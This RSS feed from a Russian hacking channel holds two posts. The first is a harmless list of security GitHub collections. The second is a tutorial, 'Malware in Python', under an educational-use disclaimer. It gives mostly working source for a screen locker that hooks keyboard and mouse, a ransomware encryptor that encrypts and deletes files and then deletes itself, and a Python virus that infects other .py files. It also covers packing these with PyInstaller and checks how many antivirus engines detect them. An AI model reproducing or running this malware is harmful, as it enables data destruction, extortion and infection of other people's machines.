<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>@h4ckers_zone</title><generator>teletype.in</generator><description><![CDATA[@h4ckers_zone]]></description><image><url>https://teletype.in/files/c1/91/c1916322-1663-4538-aa29-9058c6f618b3.jpeg</url><title>@h4ckers_zone</title><link>https://teletype.in/@h4ckers_zone</link></image><link>https://teletype.in/@h4ckers_zone?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/h4ckers_zone?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/h4ckers_zone?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Sun, 26 Apr 2026 17:35:23 GMT</pubDate><lastBuildDate>Sun, 26 Apr 2026 17:35:23 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@h4ckers_zone/Mg2kq</guid><link>https://teletype.in/@h4ckers_zone/Mg2kq?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><comments>https://teletype.in/@h4ckers_zone/Mg2kq?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone#comments</comments><dc:creator>h4ckers_zone</dc:creator><title>61 репозиторий для хакеров на Github</title><pubDate>Wed, 09 Sep 2020 00:06:33 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/ff/87/ff87b10f-d729-40f1-8b09-9be6b7b13830.jpeg"></media:content><description><![CDATA[<img src="https://teletype.in/files/ff/87/ff87b10f-d729-40f1-8b09-9be6b7b13830.jpeg"></img>Огромная подборка полезных вещей, инструментов, книг и прочих источников для хакеров, тестировщиков на проникновение и исследователей в области информационной безопасности.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/ff/87/ff87b10f-d729-40f1-8b09-9be6b7b13830.jpeg" width="1200" />
  </figure>
  <p>Огромная подборка полезных вещей, инструментов, книг и прочих источников для хакеров, тестировщиков на проникновение и исследователей в области информационной безопасности.</p>
  <hr />
  <h2><a href="https://github.com/ashishb/android-security-awesome" target="_blank">Android Security</a></h2>
  <p>Коллекция источников о безопасности Android.</p>
  <hr />
  <h2><a href="https://github.com/paragonie/awesome-appsec" target="_blank">AppSec</a></h2>
  <p>Ресурсы для изучения безопасности приложений.</p>
  <hr />
  <h2><a href="https://github.com/djadmin/awesome-bug-bounty" target="_blank">Bug Bounty</a></h2>
  <p>Список программ и записей по Bug Bounty.</p>
  <hr />
  <h2><a href="https://github.com/jshaw87/Cheatsheets" target="_blank">Cheatsheets</a></h2>
  <p>Тестирование на проникновение/ Шпаргалки по безопасности.</p>
  <hr />
  <h2><a href="https://github.com/apsdehal/awesome-ctf" target="_blank">CTF</a></h2>
  <p>Список фреймворков по CTF, библиотеки, разные источники, ПО.</p>
  <hr />
  <h2><a href="https://proglib.io/p/hacking-repositories/" target="_blank">Cyber Skills</a></h2>
  <p>Список хакерских сред, где можно отточить свои навыки легально и безопасно.</p>
  <hr />
  <h2><a href="https://github.com/devsecops/awesome-devsecops" target="_blank">DevSecOps</a></h2>
  <p>Список отличных инструментов DevSecOps, поддерживаемые сообществом.</p>
  <hr />
  <h2><a href="https://github.com/FabioBaroni/awesome-exploit-development" target="_blank">Exploit Development</a></h2>
  <p>Ресурсы для изучения Exploit Development.</p>
  <hr />
  <h2><a href="https://github.com/secfigo/Awesome-Fuzzing" target="_blank">Fuzzing</a></h2>
  <p>Список ресурсов для обучения фаззингу и начальным этапам Exploit Development вроде анализа основной причины (root cause analysis).</p>
  <hr />
  <h2><a href="https://github.com/carpedm20/awesome-hacking" target="_blank">Hacking</a></h2>
  <p>Список потрясающих туториалов, инструментов и прочих ресурсов по взлому.</p>
  <hr />
  <h2><a href="https://github.com/paralax/awesome-honeypots" target="_blank">Honeypots</a></h2>
  <p>Список ресурсов по honeypot.</p>
  <hr />
  <h2><a href="https://github.com/meirwah/awesome-incident-response" target="_blank">Incident Response</a></h2>
  <p>Список инструментов по реагированию на инциденты.</p>
  <hr />
  <h2><a href="https://github.com/hslatman/awesome-industrial-control-system-security" target="_blank">Industrial Control System Security</a></h2>
  <p>Список ресурсов, связанных с безопасностью автоматизированной системы контроля (ICS).</p>
  <hr />
  <h2><a href="https://github.com/onlurking/awesome-infosec" target="_blank">InfoSec</a></h2>
  <p>Список удивительных информационных курсов и учебных ресурсов по информационной безопасности.</p>
  <hr />
  <h2><a href="https://github.com/nebgnahz/awesome-iot-hacks" target="_blank">IoT Hacks</a></h2>
  <p>Коллекция хаков в сфере IoT.</p>
  <hr />
  <h2><a href="https://github.com/rshipp/awesome-malware-analysis" target="_blank">Malware Analysis</a></h2>
  <p>Список удивительных инструментов и ресурсов анализа вредоносных программ.</p>
  <hr />
  <h2><a href="https://github.com/jivoi/awesome-osint" target="_blank">OSINT</a></h2>
  <p>Список великолепных инструментов и ресурсов Open Source Intelligence (OSINT).</p>
  <hr />
  <h2><a href="https://github.com/ashishb/osx-and-ios-security-awesome" target="_blank">OSX and iOS Security</a></h2>
  <p>Инструменты по безопасности для OSX и iOS.</p>
  <hr />
  <h2><a href="https://github.com/caesar0301/awesome-pcaptools" target="_blank">Pcaptools</a></h2>
  <p>Сборник инструментов, разработанных исследователями в области информатики для обработки сетей.</p>
  <hr />
  <h2><a href="https://github.com/enaqx/awesome-pentest" target="_blank">Pentest</a></h2>
  <p>Список потрясающих ресурсов тестирования на проникновение, различные инструменты и выдающиеся вещи.</p>
  <hr />
  <h2><a href="https://github.com/ziadoz/awesome-php#security" target="_blank">PHP Security</a></h2>
  <p>Библиотеки для создания псевдослучайных чисел, шифрования данных и сканирования уязвимостей.</p>
  <hr />
  <h2><a href="https://github.com/fdivrp/awesome-reversing" target="_blank">Reversing</a></h2>
  <p>Список потрясающих ресурсов по обратной разработке.</p>
  <hr />
  <h2><a href="https://github.com/PaulSec/awesome-sec-talks" target="_blank">Sec Talks</a></h2>
  <p>Список полезных разговоров по безопасности.</p>
  <hr />
  <h2><a href="https://github.com/danielmiessler/SecLists" target="_blank">SecLists</a></h2>
  <p>Сборник нескольких типов списков, используемых во время оценки безопасности.</p>
  <hr />
  <h2><a href="https://github.com/sbilly/awesome-security" target="_blank">Security</a></h2>
  <p>Коллекция программного обеспечения, библиотек, документов, книг, ресурсов и других интересных материалов о безопасности.</p>
  <hr />
  <h2><a href="https://github.com/v2-dev/awesome-social-engineering" target="_blank">Social Engineering</a></h2>
  <p>Список удивительных ресурсов по социальной инженерии.</p>
  <hr />
  <h2><a href="https://github.com/mre/awesome-static-analysis" target="_blank">Static Analysis</a></h2>
  <p>Список инструментов статического анализа, линтеров и контролеров качества кода для различных языков программирования.</p>
  <hr />
  <h2><a href="https://github.com/hslatman/awesome-threat-intelligence" target="_blank">Threat Intelligence</a></h2>
  <p>Список ресурсов по Threat Intelligence.</p>
  <hr />
  <h2><a href="https://github.com/jaredthecoder/awesome-vehicle-security" target="_blank">Vehicle Security</a></h2>
  <p>Список ресурсов для изучения безопасности и взлома автомобиля.</p>
  <hr />
  <h2><a href="https://github.com/re-pronin/awesome-vulnerability-research" target="_blank">Vulnerability Research</a></h2>
  <p>Список ресурсов по исследованию уязвимостей.</p>
  <hr />
  <h2><a href="https://github.com/infoslack/awesome-web-hacking" target="_blank">Web Hacking</a></h2>
  <p>Список на тему безопасности веб-приложений.</p>
  <hr />
  <h2><a href="https://github.com/enddo/awesome-windows-exploitation" target="_blank">Windows Exploitation</a></h2>
  <p>Список потрясающих ресурсов по эксплуатации Windows.</p>
  <hr />
  <h2><a href="https://github.com/0x90/wifi-arsenal" target="_blank">WiFi Arsenal</a></h2>
  <p>Набор разнообразных инструментов для взлома 802.11.</p>
  <hr />
  <h1><a href="https://github.com/shieldfy/API-Security-Checklist" target="_blank">API Security Checklist</a></h1>
  <p>Контрольный список наиболее важных контрмер безопасности при разработке, тестировании и выпуске вашего API.</p>
  <hr />
  <h2><a href="https://github.com/kbandla/APTnotes" target="_blank">APT Notes</a></h2>
  <p>Различные публичные документы, официальные документы и статьи о целевых кибератаках(APT).</p>
  <hr />
  <h2><a href="https://github.com/ngalongc/bug-bounty-reference" target="_blank">Bug Bounty Reference</a></h2>
  <p>Список bug bounty, который отсортирован на категории, в зависимости от характеристики багов.</p>
  <hr />
  <h2><a href="https://github.com/sobolevn/awesome-cryptography" target="_blank">Cryptography</a></h2>
  <p>Инструменты и источники материалов по криптографии.</p>
  <hr />
  <h2><a href="https://github.com/SandySekharan/CTF-tool" target="_blank">CTF Tool</a></h2>
  <p>Фреймворки, библиотеки, прочие источники и ПО для Захвата Флага.</p>
  <hr />
  <h2><a href="https://github.com/qazbnm456/awesome-cve-poc" target="_blank">CVE PoC</a></h2>
  <p>Список CVE Proof of Concepts (PoCs).</p>
  <hr />
  <h2><a href="https://github.com/Cugu/awesome-forensics" target="_blank">Forensics</a></h2>
  <p>Отличные инструменты и источники по экспертному анализу.</p>
  <hr />
  <h2><a href="https://github.com/EbookFoundation/free-programming-books" target="_blank">Free Programming Books</a></h2>
  <p>Бесплатные книги для разработчиков.</p>
  <hr />
  <h2><a href="https://github.com/bt3gl/My-Gray-Hacker-Resources" target="_blank">Gray Hacker Resources</a></h2>
  <p>Полезности для Захвата флага, военных игр и пентестинга.</p>
  <hr />
  <h2><a href="https://github.com/gradiuscypher/infosec_getting_started" target="_blank">Infosec Getting Started</a></h2>
  <p>Сборник источников, документации, ссылок и прочего для того чтобы помочь людям изучить информационную безопасность.</p>
  <hr />
  <h2><a href="https://github.com/rmusser01/Infosec_Reference" target="_blank">Infosec Reference</a></h2>
  <p>Потрясающий справочник по информационной безопасности.</p>
  <hr />
  <h2><a href="https://github.com/sroberts/awesome-iocs" target="_blank">IOC</a></h2>
  <p>Коллекция источников с индикаторами компрометации.</p>
  <hr />
  <h2><a href="https://github.com/xairy/linux-kernel-exploitation" target="_blank">Linux Kernel Exploitation</a></h2>
  <p>Куча ссылок по фаззингу и эксплуатации ядра Linux.</p>
  <hr />
  <h2><a href="https://github.com/meitar/awesome-lockpicking" target="_blank">Lockpicking</a></h2>
  <p>Ресурсы, связанные с безопасностью и взломом замков, сейфов и ключей.</p>
  <hr />
  <h2><a href="https://github.com/jivoi/awesome-ml-for-cybersecurity" target="_blank">Machine Learning for Cyber Security</a></h2>
  <p>Список инструментов и ресурсов, связанных с использованием машинного обучения для кибербезопасности.</p>
  <hr />
  <h2><a href="https://github.com/seifreed/malware-scripts" target="_blank">Malware Scripts</a></h2>
  <p>Полезные скрипты, связанные с вредоносным ПО.</p>
  <hr />
  <h2><a href="https://github.com/foospidy/payloads" target="_blank">Payloads</a></h2>
  <p>Сборник по многофункциональной начинке веб-атак.</p>
  <hr />
  <h2><a href="https://github.com/swisskyrepo/PayloadsAllTheThings" target="_blank">PayloadsAllTheThings</a></h2>
  <p>Список полезной информации об обходе безопасности веб-приложений и пентестингу/захвату флага.</p>
  <hr />
  <h2><a href="https://github.com/coreb1t/awesome-pentest-cheat-sheets" target="_blank">Pentest Cheatsheets</a></h2>
  <p>Полезные трюки для пентестинга.</p>
  <hr />
  <h2><a href="https://github.com/nixawk/pentest-wiki" target="_blank">Pentest Wiki</a></h2>
  <p>Бесплатная онлайн библиотека для пентестеров и исследователей.</p>
  <hr />
  <h2><a href="https://github.com/berzerk0/Probable-Wordlists" target="_blank">Probable Wordlists</a></h2>
  <p>Словарные списки, отсортированные по вероятности, которые изначально были созданы для создания и тестирования паролей.</p>
  <hr />
  <h2><a href="https://github.com/FuzzySecurity/Resource-List" target="_blank">Resource List</a></h2>
  <p>Коллекция полезных GitHub проектов.</p>
  <hr />
  <h2><a href="https://github.com/onethawt/reverseengineering-reading-list" target="_blank">Reverse Engineering</a></h2>
  <p>Статьи, книги по обратной разработке.</p>
  <hr />
  <h2><a href="https://github.com/cn0xroot/RFSec-ToolKit" target="_blank">RFSec-ToolKit</a></h2>
  <p>Набор инструментов по протоколу передачи радио частоты.</p>
  <hr />
  <h2><a href="https://github.com/andrewjkerr/security-cheatsheets" target="_blank">Security Cheatsheets</a></h2>
  <p>Шпаргалки для разных инструментов и тем по информационной безопасности.</p>
  <hr />
  <h2><a href="https://github.com/zbetcheckin/Security_list" target="_blank">Security List</a></h2>
  <p>Великолепный список по безопасности ради удовольствия и прибыли.</p>
  <hr />
  <h2><a href="https://github.com/alebcay/awesome-shell" target="_blank">Shell</a></h2>
  <p>Список фреймворков, инструментов, гайдов, полезных вещей для того, чтобы использовать консоль по полной.</p>
  <hr />
  <h2><a href="https://github.com/Cyb3rWard0g/ThreatHunter-Playbook" target="_blank">ThreatHunter-Playbook</a></h2>
  <p>Книга для охотника за угрозами, которая поможет разработать техники и гипотезы для отлова.<br /></p>
  <hr />
  <p><a href="https://proglib.io/p/hacking-repositories/" target="_blank">Источник</a></p>
  <hr />
  <h3></h3>
  <h3>Все наши проекты можно глянуть здесь-&gt; <a href="https://t.me/h4ckers_zone" target="_blank">https://t.me/h4ckers_zone</a></h3>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@h4ckers_zone/RjBsv</guid><link>https://teletype.in/@h4ckers_zone/RjBsv?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone</link><comments>https://teletype.in/@h4ckers_zone/RjBsv?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=h4ckers_zone#comments</comments><dc:creator>h4ckers_zone</dc:creator><title>Малварь на Python</title><pubDate>Mon, 07 Sep 2020 23:19:51 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/87/8b/878b4ef3-d7c2-4156-b4ba-7da5a179707c.jpeg"></media:content><description><![CDATA[<img src="https://teletype.in/files/87/8b/878b4ef3-d7c2-4156-b4ba-7da5a179707c.jpeg"></img>Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.]]></description><content:encoded><![CDATA[
  <figure class="m_column">
    <img src="https://teletype.in/files/87/8b/878b4ef3-d7c2-4156-b4ba-7da5a179707c.jpeg" width="1200" />
  </figure>
  <p data-align="center"><strong>Данный материал предоставлен лишь в образовательных целях и создан в рамках изучения информационной безопасности. Автор не публиковал материал для вредоносных целей. Если кто-либо воспользуется информацией для личной выгоды, то автор не несёт ответственность за любой причинённый вред или ущерб.</strong></p>
  <hr />
  <h3>Содержание статьи:</h3>
  <ul>
    <li><strong>Настройка среды</strong></li>
    <li><strong>Локер</strong></li>
    <li><strong>Шифровальщик</strong></li>
    <li><strong>Вирус</strong></li>
    <li><strong>Делаем исполняемый файл</strong></li>
    <li><strong>Заключение</strong></li>
  </ul>
  <hr />
  <p>Почему кому-то может прийти в голову писать малварь на Python? Мы сделаем это, чтобы изучить общие принципы вредоносостроения, а заодно ты попрактикуешься в использовании этого языка и сможешь применять полученные знания в других целях. К тому же малварь на Python таки попадается в дикой природе, и далеко не все антивирусы обращают на нее внимание.</p>
  <p>Чаще всего Python применяют для создания бэкдоров в софте, чтобы загружать и исполнять любой код на зараженной машине. Так, в 2017 году сотрудники компании Dr.Web <a href="https://3dnews.ru/960043" target="_blank">обнаружили</a> Python.BackDoor.33, а 8 мая 2019 года был замечен <a href="https://news.drweb.ru/show/?c=9&lng=ru&i=13281" target="_blank">Mac.BackDoor.Siggen.20</a>. Другой троян — <a href="https://python-scripts.com/rat-python-telegram" target="_blank">RAT Python</a> крал пользовательские данные с зараженных устройств и использовал Telegram в качестве канала передачи данных.</p>
  <p>Мы же создадим три демонстрационные программы: локер, который будет блокировать доступ к компьютеру, пока пользователь не введет правильный пароль, шифровальщик, который будет обходить директории и шифровать все лежащие в них файлы, а также вирус, который будет распространять свой код, заражая другие программы на Python.</p>
  <hr />
  <h3>INFO</h3>
  <p>Несмотря на то что наши творения не претендуют на сколько-нибудь высокий технический уровень, они в определенных условиях могут быть опасными. Поэтому предупреждаю, что за нарушение работы чужих компьютеров и уничтожение информации может последовать строгое наказание. Давай сразу договоримся: запускать все, что мы здесь описываем, ты будешь только на своей машине, да и то осторожно — чтобы случайно не зашифровать себе весь диск.</p>
  <hr />
  <h2>Настройка среды</h2>
  <p>Итак, первым делом нам, конечно, понадобится сам Python, причем третьей версии.</p>
  <p>Дополнительно установим несколько модулей, которые будем использовать:</p>
  <pre>pip install pyAesCrypt
pip install pyautogui
pip install tkinter</pre>
  <p>На этом с подготовительным этапом покончено, можно приступать к написанию кода.</p>
  <hr />
  <h2>Локер</h2>
  <p>Идея — создаем окно на полный экран и не даем пользователю закрыть его.</p>
  <p>Импорт библиотек:</p>
  <pre>import pyautogui
from tkinter import Tk, Entry, Label
from pyautogu соi import click, moveTo
from time import sleep</pre>
  <p>Теперь возьмемся за основную часть программы.</p>
  <pre># Создаем окно
root = Tk()
# Вырубаем защиту левого верхнего угла экрана
pyautogui.FAILSAFE = False
# Получаем ширину и высоту окна
width = root.winfo_screenwidth()
height = root.winfo_screenheight()
# Задаем заголовок окна
root.title(&#x27;From &quot;Xakep&quot; with love&#x27;)
# Открываем окно на весь экран
root.attributes(&quot;-fullscreen&quot;, True)
# Создаем поле для ввода, задаем его размеры и расположение
entry = Entry(root, font=1)
entry.place(width=150, height=50, x=width/2-75, y=height/2-25)
# Создаем текстовые подписи и задаем их расположение
label0 = Label(root, text=&quot;╚(•⌂•)╝ Locker by Xakep (╯°□°）╯︵ ┻━┻&quot;, font=1)
label0.grid(row=0, column=0)
label1 = Label(root, text=&quot;Пиши пароль и жми Ctrl + C&quot;, font=&#x27;Arial 20&#x27;)
label1.place(x=width/2-75-130, y=height/2-25-100)
# Включаем постоянное обновление окна и делаем паузу
root.update()
sleep(0.2)
# Кликаем в центр окна
click(width/2, height/2)
# обнуляем ключ
k = False
# Теперь непрерывно проверяем, не введен ли верный ключ
# Если введен, вызываем функцию хулиганства
while not k:
    on_closing()</pre>
  <p>Здесь <code>pyautogui.FAILSAFE = False</code> — защита, которая активируется при перемещении курсора в верхний левый угол экрана. При ее срабатывании программа закрывается. Нам это не надо, поэтому вырубаем эту функцию.</p>
  <p>Чтобы наш локер работал на любом мониторе с любым разрешением, считываем ширину и высоту экрана и по простой формуле вычисляем, куда будет попадать курсор, делаться клик и так далее. В нашем случае курсор попадает в центр экрана, то есть ширину и высоту мы делим на два. Паузу (<code>sleep</code>) добавим для того, чтобы пользователь мог ввести код для отмены.</p>
  <p>Сейчас мы не блокировали ввод текста, но можно это сделать, и тогда пользователь никак от нас не избавится. Для этого напишем еще немного кода. Не советую делать это сразу. Сначала давай настроим программу, чтобы она выключалась при вводе пароля. Но код для блокирования клавиатуры и мыши выглядит вот так:</p>
  <pre>import pythoncom, pyHook

hm = pyHook.HookManager()
hm.MouseAll = uMad
hm.KeyAll = uMad
hm.HookMouse()
hm.HookKeyboard()
pythoncom.PumpMessages()</pre>
  <p>Создадим функцию для ввода ключа:</p>
  <pre>def callback(event):
    global k, entry
    if entry.get() == &quot;xakep&quot;:
        k = True</pre>
  <p>Тут всё просто. Если ключ не тот, который мы задали, программа продолжает работать. Если пароли совпали — тормозим.</p>
  <p>Последняя функция, которая нужна для работы окна-вредителя:</p>
  <pre>def on_closing():
    # Кликаем в центр экрана
    click(width/2, height/2)
    # Перемещаем курсор мыши в центр экрана
    moveTo(width/2, height/2)
    # Включаем полноэкранный режим
    root.attributes(&quot;-fullscreen&quot;, True)
    # При попытке закрыть окно с помощью диспетчера задач вызываем on_closing
    root.protocol(&quot;WM_DELETE_WINDOW&quot;, on_closing)
    # Включаем постоянное обновление окна
    root.update()
    # Добавляем сочетание клавиш, которые будут закрывать программу
    root.bind(&#x27;&lt;Control-KeyPress-c&gt;&#x27;, callback)</pre>
  <p>На этом наш импровизированный локер готов.</p>
  <hr />
  <h2>Шифровальщик</h2>
  <p>Этот вирус мы напишем при помощи только одной сторонней библиотеки — pyAesCrypt. Идея — шифруем все файлы в указанной директории и всех директориях ниже. Это важное ограничение, которое позволяет не сломать операционку. Для работы создадим два файла — шифратор и дешифратор. После работы исполняемые файлы будут самоудаляться.</p>
  <p>Сначала запрашиваем путь к атакуемому каталогу и пароль для шифрования и дешифровки:</p>
  <pre>direct = input(&quot;Напиши атакуемую директорию: &quot;)
password = input(&quot;Введи пароль: &quot;)</pre>
  <p>Дальше мы будем генерировать скрипты для шифрования и дешифровки. Выглядит это примерно так:</p>
  <pre>with open(&quot;Crypt.py&quot;, &quot;w&quot;) as crypt:
    crypt.write(&#x27;&#x27;&#x27;
    текст программы
    &#x27;&#x27;&#x27;)</pre>
  <p>Переходим к файлам, которые мы будем использовать в качестве шаблонов. Начнем с шифратора. Нам потребуются две стандартные библиотеки:</p>
  <pre>import os
import sys</pre>
  <p>Пишем функцию шифрования (все по мануалу pyAesCrypt):</p>
  <pre>def crypt(file):
    import pyAesCrypt
    print(&#x27;-&#x27; * 80)
    # Задаем пароль и размер буфера
    password = &quot;&#x27;&#x27;&#x27;+str(password)+&#x27;&#x27;&#x27;&quot;
    buffer_size = 512*1024
    # Вызываем функцию шифрования
    pyAesCrypt.encryptFile(str(file), str(file) + &quot;.crp&quot;, password, buffer_size)
    print(&quot;[Encrypt] &#x27;&quot;+str(file)+&quot;.crp&#x27;&quot;)
    # Удаляем исходный файл
    os.remove(file)</pre>
  <p>Вместо str(password) скрипт-генератор вставит пароль.</p>
  <p>Важные нюансы. Шифровать и дешифровать мы будем при помощи буфера, таким образом мы избавимся от ограничения на размер файла (по крайней мере, значительно уменьшим это ограничение). Вызов <code>os.remove(file)</code> нужен для удаления исходного файла, так как мы копируем файл и шифруем копию. Можно настроить копирование файла вместо удаления.</p>
  <p>Теперь функция, которая обходит папки. Тут тоже ничего сложного.</p>
  <pre>def walk(dir):
    # Перебор всех подпапок в указанной папке
    for name in os.listdir(dir):
        path = os.path.join(dir, name)
        # Если это файл, шифруем его
        if os.path.isfile(path):
            crypt(path)
        # Если это папка, рекурсивно повторяем
        else:
            walk(path)</pre>
  <p>В конце добавим еще две строки. Одна для запуска обхода, вторая — для самоуничтожения программы.</p>
  <pre>walk(&quot;&#x27;&#x27;&#x27;+str(direct)+&#x27;&#x27;&#x27;&quot;)
os.remove(str(sys.argv[0]))</pre>
  <p>Здесь снова будет подставляться нужный путь.</p>
  <p>Вот весь исходник целиком.</p>
  <pre>import os
import sys

def crypt(file):
    import pyAesCrypt
    print(&#x27;-&#x27; * 80)
    password = &quot;&#x27;&quot;+str(password)+&quot;&#x27;&quot;
    buffer_size = 512*1024
    pyAesCrypt.encryptFile(str(file), str(file) + &quot;.crp&quot;, password, buffer_size)
    print(&quot;[Encrypt] &#x27;&quot;+str(file)+&quot;.crp&#x27;&quot;)
    os.remove(file)

def walk(dir):
    for name in os.listdir(dir):
        path = os.path.join(dir, name)
        if os.path.isfile(path):
            crypt(path)
        else:
            walk(path)

walk(&quot;&#x27;&#x27;&#x27;+str(direct)+&#x27;&#x27;&#x27;&quot;)
print(&#x27;-&#x27; * 80)
os.remove(str(sys.argv[0]))</pre>
  <p>Теперь «зеркальный» файл. Если в шифровальщике мы писали encrypt, то в дешифраторе пишем decrypt. Повторять разбор тех же строк нет смысла, поэтому сразу финальный вариант.</p>
  <pre>import os
import sys

# Функция расшифровки
def decrypt(file):
    import pyAesCrypt
    print(&#x27;-&#x27; * 80)
    password = &quot;&#x27;&#x27;&#x27;+str(password)+&#x27;&#x27;&#x27;&quot;
    buffer_size = 512 * 1024
    pyAesCrypt.decryptFile(str(file), str(os.path.splitext(file)[0]), password, buffer_size)
    print(&quot;[Decrypt] &#x27;&quot; + str(os.path.splitext(file)[0]) + &quot;&#x27;&quot;)
    os.remove(file)

# Обход каталогов
def walk(dir):
    for name in os.listdir(dir):
        path = os.path.join(dir, name)
        if os.path.isfile(path):
            try:
                decrypt(path)
            except Error:
                pass
        else:
            walk(path)

walk(&quot;&#x27;&#x27;&#x27;+str(direct)+&#x27;&#x27;&#x27;&quot;)
print(&#x27;-&#x27; * 80)
os.remove(str(sys.argv[0]))</pre>
  <p>Итого 29 строк, из которых на дешифровку ушло три. На случай, если какой-то из файлов вдруг окажется поврежденным и возникнет ошибка, пользуемся отловом исключений (<code>try...except</code>). То есть, если не получиться расшифровать файл, мы его просто пропускаем.</p>
  <hr />
  <h2>Вирус</h2>
  <p>Здесь идея в том, чтобы создать программу, которая будет заражать другие программы с указанным расширением. В отличие от настоящих вирусов, которые заражают любой исполняемый файл, наш будет поражать только другие программы на Python.</p>
  <p>На этот раз нам не потребуются никакие сторонние библиотеки, нужны только модули sys и os. Подключаем их.</p>
  <pre>import sys
import os</pre>
  <p>Создадим три функции: сообщение, парсер, заражение.</p>
  <p>Функция, которая сообщает об атаке:</p>
  <pre>def code(void):
    print(&quot;Infected&quot;)</pre>
  <p>Сразу вызовем ее, чтобы понять, что программа отработала:</p>
  <pre>code(None)</pre>
  <p>Обход директорий похож на тот, что мы делали в шифровальщике.</p>
  <pre>def walk(dir):
    for name in os.listdir(dir):
        path = os.path.join(dir, name)
        # Если нашли файл, проверяем его расширение
        if os.path.isfile(path):
            # Если расширение — py, вызываем virus
            if (os.path.splitext(path)[1] == &quot;.py&quot;):
                virus(path)
            else:
                pass
        else:
            # Если это каталог, заходим в него
            walk(path)        </pre>
  <hr />
  <h2>INFO</h2>
  <p>В теории мы могли бы таким же образом отравлять исходники и на других языках, добавив код на этих языках в файлы с соответствующими расширениями. А в Unix-образных системах скрипты на Bash, Ruby, Perl и подобном можно просто подменить скриптами на Python, исправив путь к интерпретатору в первой строке.</p>
  <p>Вирус будет заражать файлы «вниз» от того каталога, где он находится (путь мы получаем, вызвав <code>os.getcwd()</code>).</p>
  <p>В начале и в конце файла пишем вот такие комментарии:</p>
  <pre># START #
# STOP #</pre>
  <p>Чуть позже объясню зачем.</p>
  <p>Дальше функция, которая отвечает за саморепликацию.</p>
  <pre>def virus(python):
    begin = &quot;# START #\n&quot;
    end = &quot;# STOP #\n&quot;
    # Читаем атакуемый файл, назовем его copy
    with open(sys.argv[0], &quot;r&quot;) as copy:
        # Создаем флаг
        k = 0
        # Создаем переменную для кода вируса и добавляем пустую строку
        virus_code = &quot;\n&quot;
        # Построчно проходим заражаемый файл
        for line in copy:
            # Если находим маркер начала, поднимаем флаг
            if line == begin:
                k = 1
                # Добавляем маркер в зараженный код
                virus_code += begin
            # Если мы прошли начало, но не дошли до конца, копируем строку
            elif k == 1 and line != end:
                virus_code += line
            # Если дошли до конца, добавляем финальный маркер и выходим из цикла
            elif line == end:
                virus_code += end
                break
            else:
                pass
    # Снова читаем заражаемый файл
    with open(python, &quot;r&quot;) as file:
        # Создаем переменную для исходного кода
        original_code = &quot;&quot;
        # Построчно копируем заражаемый код
        for line in file:
            original_code += line
            # Если находим маркер начала вируса, останавливаемся и поднимаем флаг vir
            if line == begin:
                vir = True
                break
            # Если маркера нет, опускаем флаг vir
            else:
                vir = False
    # Если флаг vir опущен, пишем в файл вирус и исходный код
    if not vir:
        with open(python, &quot;w&quot;) as paste:
            paste.write(virus_code + &quot;\n\n&quot; + original_code)
    else:
        pass</pre>
  <p>Теперь, думаю, стало понятнее, зачем нужны метки «старт» и «стоп». Они обозначают начало и конец кода вируса. Сперва мы читаем файл и построчно просматриваем его. Когда мы наткнулись на стартовую метку, поднимаем флаг. Пустую строку добавляем, чтобы вирус в исходном коде начинался с новой строки. Читаем файл второй раз и записываем построчно исходный код. Последний шаг — пишем вирус, два отступа и оригинальный код. Можно поиздеваться и записать его как-нибудь по-особому — например, видоизменить все выводимые строки.</p>
  <hr />
  <h2>Делаем исполняемый файл</h2>
  <p>Как запустить вирус, написанный на скриптовом языке, на машине жертвы? Есть два пути: либо как-то убедиться, что там установлен интерпретатор, либо запаковать наше творение вместе со всем необходимым в единый исполняемый файл. Этой цели служит утилита PyInstaller. Вот как ей пользоваться.</p>
  <p>Устанавливаем</p>
  <pre>pip install PyInstaller</pre>
  <p>И вводим команду</p>
  <pre>PyInstaller &quot;имя_файла.py&quot; --onefile --noconsole</pre>
  <p>Немного ждем, и у нас в папке с программой появляется куча файлов. Можешь смело избавляться от всего, кроме экзешников, они будет лежать в папке dist.</p>
  <p>Говорят, что с тех пор, как начали появляться вредоносные программы на Python, антивирусы стали крайне нервно реагировать на PyInstaller, причем даже если он прилагается к совершенно безопасной программе.</p>
  <p>Я решил проверить, что VirusTotal скажет о моих творениях. Вот отчеты:</p>
  <ul>
    <li>файл Crypt.exe не понравился <a href="https://www.virustotal.com/gui/file/3710ef86d5ab7d6a8692579f87c386176be75f11e2f01472ae113f02d82dbba8/detection" target="_blank">12 антивирусам из 72</a>;</li>
    <li>файл Locker.exe — <a href="https://www.virustotal.com/gui/file/2ef398d03298bc1a6e13169d210c95e3fc4217b05adb926f443dfa51ff65cad9/detection" target="_blank">10 антивирусам из 72</a>;</li>
    <li>файл Virus.exe — <a href="https://www.virustotal.com/gui/file/fa92be3dc7daeef50fe127b81131c3362bdeb7e6eaba058e0eeaf0ea5cf2adc0/detection" target="_blank">23 антивирусам из 72</a>.</li>
  </ul>
  <p>Худший результат показал Virus.exe — то ли некоторые антивирусы обратили внимание на саморепликацию, то ли просто название файла не понравилось. Но как видишь, содержимое любого из этих файлов насторожило далеко не все антивирусы.</p>
  <hr />
  <h2>Заключение</h2>
  <p>Итак, мы написали три вредоносные программы, использовав скриптовый язык, и упаковали их при помощи PyInstaller.</p>
